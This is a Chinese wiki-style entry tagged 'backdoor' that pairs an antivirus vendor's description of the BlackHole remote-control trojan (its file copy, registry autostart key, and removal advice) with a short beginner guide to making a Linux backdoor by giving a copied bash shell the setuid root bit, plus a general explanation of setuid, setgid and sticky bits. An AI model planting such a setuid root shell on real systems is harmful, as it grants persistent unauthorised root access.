    该病毒文件运行后会将创建自身副本到用户系统%SYSTEM%目录下,副本文件名为BRC_SERVER.EXE;病毒将启进程实现对用户系统的远程控制;并在注册表中添加如下项来实现开机自启动。
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesBRC_Services
  BlackHole Remote Control Services = (IMAGEPATH)"%SYSTEM%BRC_SERVER.EXE" /SERVICE  

安全建议:

    1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。

    2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。

    3 不浏览不良网站,不随意下载安装可疑插件。

    4 不接收QQ、MSN、Emial等传来的可疑文件。

    5 上网时打开杀毒软件实时监控功能。

    6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。

清除办法:

    瑞星杀毒软件清除办法:

    安装瑞星杀毒软件,升级到20.34.31版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。

超初级的linux后门制作方法编辑本段回目录

众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方,然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了

  一个文件都有一个所有者, 表示该文件是谁创建的. 同时, 该文件还有一个组编号, 表示该文件所属的组, 一般为文件所有者所属的组.

  如果是一个可执行文件, 那么在执行时, 一般该文件只拥有调用该文件的用户具有的权限. 而setuid, setgid 可以来改变这种设置.

  setuid: 设置使文件在执行阶段具有文件所有者的权限. 典型的文件是 /usr/bin/passwd. 如果一般用户执行该文件, 则在执行过程中, 该文件可以获得root权限, 从而可以更改用户的密码.

  setgid: 该权限只对目录有效. 目录被设置该位后, 任何用户在此目录下创建的文件都具有和该目录所属的组相同的组.

  sticky bit: 该位可以理解为防删除位. 一个文件是否可以被某用户删除, 主要取决于该文件所属的组是否对该用户具有写权限. 如果没有写权限, 则这个目录下的所有文件都不能被删除, 同时也不能添加新的文件. 如果希望用户能够添加文件但同时不能删除文件, 则可以对文件使用sticky bit位. 设置该位后, 就算用户对目录具有写权限, 也不能删除该文件.

  下面说一下如何操作这些标志:

  操作这些标志与操作文件权限的命令是一样的, 都是 chmod. 有两种方法来操作,

  1) chmod u+s temp -- 为temp文件加上setuid标志. (setuid 只对文件有效)

  chmod g+s tempdir -- 为tempdir目录加上setgid标志 (setgid 只对目录有效)

  chmod o+t temp -- 为temp文件加上sticky标志 (sticky只对文件有效)

  2) 采用八进制方式. 对一般文件通过三组八进制数字来置标志, 如 666, 777, 644等. 如果设置这些特殊标志, 则在这组数字之外外加一组八进制数字. 如 4666, 2777等. 这一组八进制数字三位的意义如下,

  abc

  a - setuid位, 如果该位为1, 则表示设置setuid

  b - setgid位, 如果该位为1, 则表示设置setgid

  c - sticky位, 如果该位为1, 则表示设置sticky

  设置完这些标志后, 可以用 ls -l 来查看. 如果有这些标志, 则会在原来的执行标志位置上显示. 如

  rwsrw-r-- 表示有setuid标志

  rwxrwsrw- 表示有setgid标志

  rwxrw-rwt 表示有sticky标志

  那么原来的执行标志x到哪里去了呢? 系统是这样规定的, 如果本来在该位上有x, 则这些特殊标志显示为小写字母 (s, s, t). 否则, 显示为大写字母 (S, S, T)

 

→如果您认为本词条还有待完善,请 编辑词条

词条内容仅供参考,如果您需要解决具体问题
(尤其在法律、医学等领域),建议您咨询相关领域专业人士。
0

标签: 后门

收藏到: Favorites  

同义词: 暂无同义词

关于本词条的评论 (共0条)发表评论>>

对词条发表评论

评论长度最大为200个字符。